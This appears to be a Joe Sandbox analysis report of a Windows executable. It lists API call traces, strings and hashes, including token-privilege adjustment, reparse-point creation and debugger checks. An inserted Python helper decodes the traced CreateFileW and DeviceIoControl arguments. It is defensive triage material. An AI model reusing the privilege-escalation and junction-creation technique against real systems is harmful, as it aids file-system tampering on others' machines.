• Opcode ID: a0e0482eef27e39e818fc372b98a5a9e5281770223a349f829680370df9cb11d
• Instruction ID: 4f7029223cc9bfe80eb94b922fb7cc38893bf222af06625d23a75974d8a968ff
• Opcode Fuzzy Hash: a0e0482eef27e39e818fc372b98a5a9e5281770223a349f829680370df9cb11d
• Instruction Fuzzy Hash: 03018C30905790DAC705E7A5C2117EDB7A4AF2430CF1044DEA456632C3CBB82B88CB6B
APIs
  • Part of subcall function 00409FC4: _wcspbrk.LIBCMT ref: 00409FD5
• FindClose.KERNELBASE(00000000,00000800,000000FF,?,?,?,?,00408331,?,?,00000000,?,00000800), ref: 0040960C
Similarity
• API ID: CloseFind_wcspbrk
• String ID:
• API String ID: 2190230203-0
• Opcode ID: 39ea26712d5ca65ab045286081f21ff3b2941b1a2c09988302a67c024bc4b7b4
• Instruction ID: 7878f6d5e33578875329d5721eebc5f6fc2c64fa75cc553fad57c447ec83d0bc
• Opcode Fuzzy Hash: 39ea26712d5ca65ab045286081f21ff3b2941b1a2c09988302a67c024bc4b7b4
• Instruction Fuzzy Hash: 34F09036005380AACA226B758804BCB7F955F55335F048A1EB1F8721D3C779189ADB6A
APIs
• __EH_prolog.LIBCMT ref: 00406FBF
  • Part of subcall function 00415380: __EH_prolog.LIBCMT ref: 00415385
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: de15e8dc75b4bd31bcdafa08aae457da7714568970e2e6915e40c43a43641d32
• Instruction ID: 106a3ede041e0e9e37d9b754b64534ee1dc51bc7015f9c7dddf168db923a4940
• Opcode Fuzzy Hash: de15e8dc75b4bd31bcdafa08aae457da7714568970e2e6915e40c43a43641d32
• Instruction Fuzzy Hash: 98E092325116109BCB19AB29D4027EEF374EFC0728F10036FE432732C1DBB86D418659
APIs
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: c7a22f7798279a6f7519e1e5fc0ec24188ae8916def0818a0b6c4e85bab034ef
• Instruction ID: d642d3f8287545d7ea58b2778da428c31f7e4de34155637f5aa8441520eafd07
• Opcode Fuzzy Hash: c7a22f7798279a6f7519e1e5fc0ec24188ae8916def0818a0b6c4e85bab034ef
• Instruction Fuzzy Hash: C5E0CD7190474039E321911DDC04F57AAD84B91724F14CC2FF189A72C3D1BC5C41876D
APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041EBBC
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
• Instruction ID: 38f121e58b7adadffe473ae12edbf1895aca69ad112a4ea178b6eb37c437d7d7
• Opcode Fuzzy Hash: bf1e3bf3518953ba1a1cfb351a5287f9267f10c5b3ddaf736794a120e8baedd1
• Instruction Fuzzy Hash: F1D02E3A6443085AEB109F726C08B323BDCE3843A5F000032B80DC2180F230C4908508
APIs
• GetFileType.KERNELBASE(?,00408BFA,?,00408DD0,?,00000000,00000800,?,00000000), ref: 00408B86
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
• Instruction ID: 1d77a9bd8de83f147cfd22e66b227f25cb911925b8e818fa8ece2c974cfb7da4
• Opcode Fuzzy Hash: 5e2d871cb3fe1c1969b66f3fe9a3872159f564dc7bdc06796f72dfcbfb14f326
• Instruction Fuzzy Hash: 43C012F151010052CEB046385E4805B376697433667684EBDF1A5D11D1CB39DC42F005
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0040D3E0
  • Part of subcall function 0040CFC8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CFD9
  • Part of subcall function 0040CFC8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040CFEA
  • Part of subcall function 0040CFC8: TranslateMessage.USER32(?), ref: 0040CFF4
  • Part of subcall function 0040CFC8: DispatchMessageW.USER32(?), ref: 0040CFFE
Similarity
• API ID: Message$DispatchItemPeekSendTranslate
• String ID:
• API String ID: 4142818094-0
• Opcode ID: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
• Instruction ID: 3b13af5d56a39e5f22369b2d9f50570f7d85299dd9acab15ffa417331e8d843b
• Opcode Fuzzy Hash: 96d894961c4767c1e64a66d43eb6f3f9f031ba28b070713e1493db6d830df4c7
• Instruction Fuzzy Hash: 0AC01231240300ABD7117B10DE07F193552BB40708F508139B744340F1C5B648329A0A
APIs
• _doexit.LIBCMT ref: 004214C1
  • Part of subcall function 00421389: __lock.LIBCMT ref: 00421397
  • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 004213CE
  • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 004213E3
  • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 0042140D
  • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 00421423
  • Part of subcall function 00421389: __decode_pointer.LIBCMT ref: 00421430
  • Part of subcall function 00421389: __initterm.LIBCMT ref: 0042145F
  • Part of subcall function 00421389: __initterm.LIBCMT ref: 0042146F
Similarity
• API ID: __decode_pointer$__initterm$__lock_doexit
• String ID:
• API String ID: 1597249276-0
• Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction ID: a641cbc9880caa42f80c5c55f80c2b4a079778160b429ae487eec97669a62b75
• Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
• Instruction Fuzzy Hash: C4B0923268020833EA202A42AC07F463A0E87D0B68E650021BA0C195A1A9A2B9618189
APIs
• SetEndOfFile.KERNELBASE(?,00407FFA,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 00408B6A
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
• Opcode ID: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
• Instruction ID: 8764dd92a4aeea9fc6a797bc89121622734c807ffe49c2e46d1e29d47898f422
• Opcode Fuzzy Hash: c635e92dd265372a0ac16abef4fb17a803da047c5b1ded40a1a00e6431af769c
• Instruction Fuzzy Hash: 45B011303A000A8B8F202B30CE088283A20EB2230A30082B0A02AC80A0CB23C023AA00
APIs
• SetCurrentDirectoryW.KERNELBASE(?,0040D795,0042A644,00000000,?,00000006,?,00000800), ref: 00419A01
                                                                                  Similarity
                                                                                  • API ID: CurrentDirectory
                                                                                  • String ID:
                                                                                  • API String ID: 1611563598-0
                                                                                  • Opcode ID: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
                                                                                  • Instruction ID: 175a8f5435bd407339ccdaf5ebd2187c03bf393c5a072438874265726e840e79
                                                                                  • Opcode Fuzzy Hash: d3f7c641652e8f08ac12cbb3d58c3bebf67a7f5dc113771634cfd816c524747e
                                                                                  • Instruction Fuzzy Hash: 98A0123039400647CA100F34CD0A82575505760B02F0086307006C00A0CB304430A505
                                                                                  APIs
                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0040DD88
                                                                                  • DestroyIcon.USER32(00000000), ref: 0040DD93
                                                                                  • EndDialog.USER32(?,00000006), ref: 0040DD9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyDialogIconItemMessageSend
                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                  • API String ID: 3309745630-1840816070
                                                                                  • Opcode ID: 5e139d720a9ebed7bd3f1c1d003199c373304d34a840406cf30bca9b4f5c3397
                                                                                  • Instruction ID: fa0b8f752fa8c0d846640355b86fcc42a38a471cbb23b859a5d7e6fa7d0d957f
                                                                                  • Opcode Fuzzy Hash: 5e139d720a9ebed7bd3f1c1d003199c373304d34a840406cf30bca9b4f5c3397
                                                                                  • Instruction Fuzzy Hash: 4CA16472A4011CBBEB21EFE0CC85FEF776DEF04704F400466BA05E60D1D6799A598B69
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00406899
                                                                                  • _wcslen.LIBCMT ref: 00406902
                                                                                  • _wcscpy.LIBCMT ref: 0040696E
                                                                                  • _wcslen.LIBCMT ref: 0040697A
                                                                                    • Part of subcall function 004064DD: GetCurrentProcess.KERNEL32(00000020,?), ref: 004064EC
                                                                                    • Part of subcall function 004064DD: OpenProcessToken.ADVAPI32(00000000), ref: 004064F3
                                                                                    • Part of subcall function 004064DD: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00406513
                                                                                    • Part of subcall function 004064DD: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00406528
                                                                                    • Part of subcall function 004064DD: GetLastError.KERNEL32 ref: 00406532
                                                                                    • Part of subcall function 004064DD: CloseHandle.KERNEL32(?), ref: 00406541
                                                                                    • Part of subcall function 0040927F: _wcsncpy.LIBCMT ref: 004092E6
                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000001), ref: 004069FB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00406A0C
                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000001), ref: 00406A19
                                                                                  • _wcscpy.LIBCMT ref: 00406A65
                                                                                  • _wcscpy.LIBCMT ref: 00406A89
                                                                                  • _wcscpy.LIBCMT ref: 00406AD5
                                                                                  • _wcscpy.LIBCMT ref: 00406AFE
                                                                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406B24
                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00406B4F
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00406B5A
                                                                                  • GetLastError.KERNEL32 ref: 00406B6C
                                                                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406BA1
                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00406BA9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy$CloseCreateFileHandle$DirectoryErrorLastProcessToken_wcslen$AdjustControlCurrentDeleteDeviceH_prologLookupOpenPrivilegePrivilegesRemoveValue_wcsncpy
                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                  • API String ID: 295717069-3508440684
                                                                                  • Opcode ID: fec5147fc01d9f34a502e68caa46c748142a0b958b89c88ea65a7e80bfc16d33
                                                                                  • Instruction ID: 45f9c9a60937e065ab61df6fe3d998c353ec3866802773e54f17ef37c5d24b46
                                                                                  • Opcode Fuzzy Hash: fec5147fc01d9f34a502e68caa46c748142a0b958b89c88ea65a7e80bfc16d33
                                                                                  • Instruction Fuzzy Hash: 05B1D371A00215AFDF21DF64CC45BDA77B8FF04314F00446AF95AE7281D778AAA4CB69
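                                                                                  The argument lists the sandbox prints for this function are raw hex. As an added example (not part of the Joe Sandbox report and not code from the analysed sample), the Python below decodes the CreateFileW and DeviceIoControl arguments from this entry's trace into their documented Win32 names: 0x02200000 is FILE_FLAG_OPEN_REPARSE_POINT|FILE_FLAG_BACKUP_SEMANTICS and 0x000900A4 is FSCTL_SET_REPARSE_POINT, which together with the SeCreateSymbolicLinkPrivilege/SeRestorePrivilege and \??\ strings is the pattern for creating a reparse point (symbolic link or junction) by hand. The three trace lines are copied from the entry above, the constant values are the documented ones from winnt.h/winioctl.h, and the function and table names are this example's own.

```python
"""Decode raw Win32 arguments from Joe Sandbox API trace lines.

Added example; not code from the report or from the analysed sample.
Constant values are the documented ones from winnt.h / winioctl.h.
"""
import re

# --- documented Win32 constants ---------------------------------------------
GENERIC_ACCESS = {
    0x10000000: "GENERIC_ALL",
    0x20000000: "GENERIC_EXECUTE",
    0x40000000: "GENERIC_WRITE",
    0x80000000: "GENERIC_READ",
}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATE_DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}
FILE_FLAGS = {
    0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}
DEVICE_TYPES = {0x07: "FILE_DEVICE_DISK", 0x09: "FILE_DEVICE_FILE_SYSTEM"}
IOCTL_METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
IOCTL_ACCESS = ["FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
                "FILE_READ_ACCESS|FILE_WRITE_ACCESS"]
# FSCTL function numbers on FILE_DEVICE_FILE_SYSTEM (winioctl.h)
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}

# Constructed sample input: the three trace lines copied from the report entry above.
SAMPLE_TRACE = [
    "CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000001), ref: 004069FB",
    "CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00406B24",
    "DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00406B4F",
]

TRACE_RE = re.compile(r"(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_arg(token):
    """One sandbox argument: hex, optionally negative; '?' means unresolved."""
    token = token.strip()
    if token in ("", "?"):
        return None
    sign = -1 if token.startswith("-") else 1
    return sign * int(token.lstrip("-"), 16)


def parse_trace_line(line):
    """Return (api, module, args, ref) for a 'Api.MODULE(args), ref: addr' line."""
    match = TRACE_RE.search(line)
    if not match:
        raise ValueError(f"not a Joe Sandbox API trace line: {line!r}")
    api, module, raw_args, ref = match.groups()
    args = [parse_arg(t) for t in raw_args.split(",")] if raw_args else []
    return api, module, args, int(ref, 16)


def decode_flags(value, table):
    """Split a bitmask into known flag names (ascending bit order); leftover bits stay hex."""
    names, remaining = [], value
    for bit in sorted(table):
        if (value & bit) == bit:
            names.append(table[bit])
            remaining &= ~bit
    if remaining:
        names.append(f"0x{remaining:08X}")
    return names


def decode_ctl_code(code):
    """Undo CTL_CODE(): (DeviceType<<16) | (Access<<14) | (Function<<2) | Method."""
    device, access = code >> 16, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    name = FSCTL_FUNCTIONS.get(function) if device == 0x9 else None
    return {"device": DEVICE_TYPES.get(device, f"0x{device:X}"), "access": IOCTL_ACCESS[access],
            "function": function, "method": IOCTL_METHODS[method], "name": name}


def decode_createfile(args):
    """CreateFileW(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
    dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile). The sandbox may
    print extra stack slots after the seven real parameters; they are ignored."""
    if len(args) < 7:
        raise ValueError("CreateFileW needs 7 arguments")
    _, access, share, _, disposition, flags, _ = args[:7]
    return {"access": decode_flags(access, GENERIC_ACCESS),
            "share": decode_flags(share, SHARE_MODE) or ["0 (exclusive)"],
            "disposition": CREATE_DISPOSITION.get(disposition, f"0x{disposition:X}"),
            "flags": decode_flags(flags, FILE_FLAGS)}


def describe(line):
    """Parse one trace line and decode the arguments of the APIs we know."""
    api, _module, args, ref = parse_trace_line(line)
    if api == "CreateFileW":
        d = decode_createfile(args)
        detail = (f"access={'|'.join(d['access'])} share={'|'.join(d['share'])} "
                  f"disposition={d['disposition']} flags={'|'.join(d['flags'])}")
    elif api == "DeviceIoControl":
        d = decode_ctl_code(args[1])  # dwIoControlCode is the second parameter
        detail = (f"code={d['name'] or 'unknown'} ({d['device']}, function {d['function']}, "
                  f"{d['method']}, {d['access']})")
    else:
        detail = "no decoder"
    return f"{ref:08X} {api}: {detail}"


def summarize(trace_lines):
    return [describe(line) for line in trace_lines]


if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_TRACE)))
```

                                                                                  Run stand-alone, the script prints one decoded line per trace entry; the same decode_ctl_code routine works for any DeviceIoControl code in a report, since it simply reverses the CTL_CODE bit layout, and only the name lookup is limited to the reparse-point FSCTLs listed in the table.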
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __byteswap_ulong
                                                                                  • String ID: 8Z@
                                                                                  • API String ID: 2309504477-3820067188
                                                                                  • Opcode ID: 9f117c7e7c4f073d62743699c9974dacf17771ceaf79ce7deef3240e054eaf93
                                                                                  • Instruction ID: 860ed8aa975c420535b50c32d487b6e313711c98d635ade82304f14efeb4dbb3
                                                                                  • Opcode Fuzzy Hash: 9f117c7e7c4f073d62743699c9974dacf17771ceaf79ce7deef3240e054eaf93
                                                                                  • Instruction Fuzzy Hash: 8C91FAB1A006048FCB24DF59C881A9DBBF1FF4C308F0445AEE54AE7722D739A9958F45
                                                                                  APIs
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00423CEE
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423D03
                                                                                  • UnhandledExceptionFilter.KERNEL32(`D), ref: 00423D0E
                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00423D2A
                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00423D31
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                  • String ID: `D
                                                                                  • API String ID: 2579439406-1070873967
                                                                                  • Opcode ID: 56c5a62fb2f7f6636291a6d14797e7b81fa4396f563e9201061004f269c01aac
                                                                                  • Instruction ID: 2015641654b75937153e36d01346c21e17e79de6d81aa9230b99b4eb3045d80e
                                                                                  • Opcode Fuzzy Hash: 56c5a62fb2f7f6636291a6d14797e7b81fa4396f563e9201061004f269c01aac
                                                                                  • Instruction Fuzzy Hash: 4721C078600244EFE710DF26F8456547BB0BB1E314FA049BAE80983361E7B5599ACF1E
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp$H_prolog
                                                                                  • String ID: @$CMT
                                                                                  • API String ID: 212800410-3935043585
                                                                                  • Opcode ID: 289be22be8d8e21ea6c2de34b842591e7535171eb9dfa8655e80555d37c1e7ab
                                                                                  • Instruction ID: 74599023937fd8df6c33bc0beffbe5af872e8d8d66d8c1774feb90eaf4e5afae
                                                                                  • Opcode Fuzzy Hash: 289be22be8d8e21ea6c2de34b842591e7535171eb9dfa8655e80555d37c1e7ab
                                                                                  • Instruction Fuzzy Hash: 672206715006849FDB14DF24C881BEA3BE5EF14309F08047FED4AAB2C6DB799689CB59
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(00000020,?), ref: 004064EC
                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004064F3
                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00406513
                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00406528
                                                                                  • GetLastError.KERNEL32 ref: 00406532
                                                                                  • CloseHandle.KERNEL32(?), ref: 00406541
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                  • String ID:
                                                                                  • API String ID: 3398352648-0
                                                                                  • Opcode ID: ffeccf25956bfd93346b2d86616f67c4b85d78278941fcedc4f79907d0ffdda3
                                                                                  • Instruction ID: 5730f10ad350693b3656b398f843758227311bbc3d817beba93dcbd445191771
                                                                                  • Opcode Fuzzy Hash: ffeccf25956bfd93346b2d86616f67c4b85d78278941fcedc4f79907d0ffdda3
                                                                                  • Instruction Fuzzy Hash: DE011DB1600208BFDB209FA4ED89EAF7BBCEB04744F800076F902E1290D735CE659A35
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: XD$\D$tD$|D$|D$D$D
                                                                                  • API String ID: 0-3078164799
                                                                                  • Opcode ID: f36a09e5f26d8d62a54f4afe5aedbf896fa39a0e4924dd30a6198e919e352f8c
                                                                                  • Instruction ID: 8307f29fc7fc21a0a082ea922b051b0646981432ef55bab89a48cea2fea95e04
                                                                                  • Opcode Fuzzy Hash: f36a09e5f26d8d62a54f4afe5aedbf896fa39a0e4924dd30a6198e919e352f8c
                                                                                  • Instruction Fuzzy Hash: FAD14C72A0021ACFCF14CF58D880599B7B1FF8C308B2685ADE919AB341D731BA56CF94
                                                                                  APIs
                                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0040D02D
                                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,0042F0CC,?,?), ref: 0040D07A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                  • String ID:
                                                                                  • API String ID: 2169056816-0
                                                                                  • Opcode ID: 804a2e1f4122a07eb972676116a6fd6af5b1b2391d4556cd137941413f2e30aa
                                                                                  • Instruction ID: ed338014c1c8d88939eefb6e2212735ed7d912fdd58134f1746a66ff11774296
                                                                                  • Opcode Fuzzy Hash: 804a2e1f4122a07eb972676116a6fd6af5b1b2391d4556cd137941413f2e30aa
                                                                                  • Instruction Fuzzy Hash: 85015E75610208AED720DFA4DC41BAAB3B8EF49714F408036BA48D7161D37498198B6D
                                                                                  APIs
                                                                                  • GetSystemTime.KERNEL32(?), ref: 00411111
                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041111F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
